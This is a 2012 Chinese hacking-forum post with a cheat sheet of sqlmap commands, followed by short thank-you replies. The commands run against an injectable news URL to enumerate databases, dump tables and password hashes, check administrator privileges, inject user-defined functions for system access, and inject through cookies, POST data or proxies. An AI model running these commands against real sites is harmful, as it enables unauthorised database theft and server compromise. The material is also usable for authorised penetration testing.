Sqlmap最新测试文档

90_ · 发表于 2012-8-3 10:08:52

sqlmap -h

官方最新文档:http://sqlmap.sourceforge.net/doc/README.html

sqlmap -u "http://www.ihonker.org /news?id=1"
--current-user # 获取当前用户名称

sqlmap -u "http://www.xxoo.com/news?id=1"
--current-db  # 获取当前数据库名称

sqlmap -u "http://www.xxoo.com/news?id=1"
--tables  -D "db_name" #列表名

sqlmap -u "http://www.ihonker.org /news?id=1"
--columns -T "tablename" users-D "db_name" - v 0 #列字段

sqlmap -u "http://www.ihonker.org /news?id=1"
--dump
- C "column_name"  -T "table_name" - D

"db_name" -v 0  # 获取字段内容

****************** 信息获取 ******************

sqlmap -u "http://www.ihonker.org /news?id=1" --smart --level 3 --users # smart 智能 level 执行测试等级
Sqlmap 最新测试文档 Email:linuxseclab@gmiall.com

sqlmap -u "http://www.ihonker.org /news?id=1" --dbms "Mysql" --users # dbms 指定数据库类型

sqlmap -u "http://www.ihonker.org /news?id=1" --users # 列数据库用户

sqlmap -u "http://www.ihonker.org /news?id=1" --dbs# 列数据库

sqlmap -u "http://www.ihonker.org /news?id=1" --passwords # 数据库用户密码

sqlmap -u "http://www.ihonker.org /news?id=1" --passwords-U root -v 0 # 列出指定用户数据库密码

sqlmap -u "http://www.ihonker.org /news?id=1" --dump -C "password,user,id" -T "tablename" - D "db_name" - - start 1 --stop 20 #列出指定字段，列出 20 条

sqlmap -u "http://www.ihonker.org /news?id=1" --dump-all -v 0 #列出所有数据库所有表

sqlmap -u "http://www.ihonker.org /news?id=1" --privileges # 查看权限

sqlmap -u "http://www.ihonker.org /news?id=1" --privileges -U root # 查看指定用户权限

sqlmap -u "http://www.ihonker.org /news?id=1" --is-dba - v 1 #是否是数据库管理员

sqlmap -u "http://www.ihonker.org /news?id=1" --roles # 枚举数据库用户角色

sqlmap -u "http://www.ihonker.org /news?id=1" --udf-inject # 导入用户自定义函数（获取系统权限！）

sqlmap -u "http://www.ihonker.org /news?id=1" --dump-all --exclude-sysdbs -v 0 # 列出当前库所有表

sqlmap -u "http://www.ihonker.org /news?id=1" --union-cols #union 查询表记录

sqlmap -u "http://www.ihonker.org /news?id=1" --cookie "COOKIE_VALUE" #cookie 注入

sqlmap -u "http://www.ihonker.org /news?id=1" -b # 获取 banner 信息

sqlmap -u "http://www.ihonker.org /news?id=1" --data "id=3" #post 注入

sqlmap -u "http://www.ihonker.org /news?id=1" -v 1 -f # 指纹判别数据库类型

sqlmap -u "http://www.ihonker.org /news?id=1" --proxy"http://127.0.0.1:8118" # 代理注入

sqlmap -u "http://www.ihonker.org /news?id=1"--string"STRING_ON_TRUE_PAGE" # 指定关键词

游客，如果您要查看本帖隐藏内容请回复

Tunixer · 发表于 2012-8-3 10:27:31

这个很有用处。。。感谢提供 sqlmap是个好工具

hack_qzob · 发表于 2012-8-3 17:04:23

为什么我装的BT5没有sqlmap啊

lantian · 发表于 2012-8-31 13:22:53

哈哈 bt5

youko · 发表于 2013-1-19 14:20:25

谢谢最近研究这个

xiaolynn · 发表于 2013-2-19 13:54:52

这个不错，，，

雨中的月 · 发表于 2013-3-14 16:01:41

谢谢分享！！！！！！！！！！

Mody · 发表于 2013-3-17 11:11:22

看看隐藏的u我想要的

xsxq123 · 发表于 2013-3-18 22:56:30

不是在后面家命令吗

sickles · 发表于 2013-3-19 15:10:08

工具需要认真研究灵活运用，学习ing

Sqlmap最新测试文档

指导单位

旗下站点

联系我们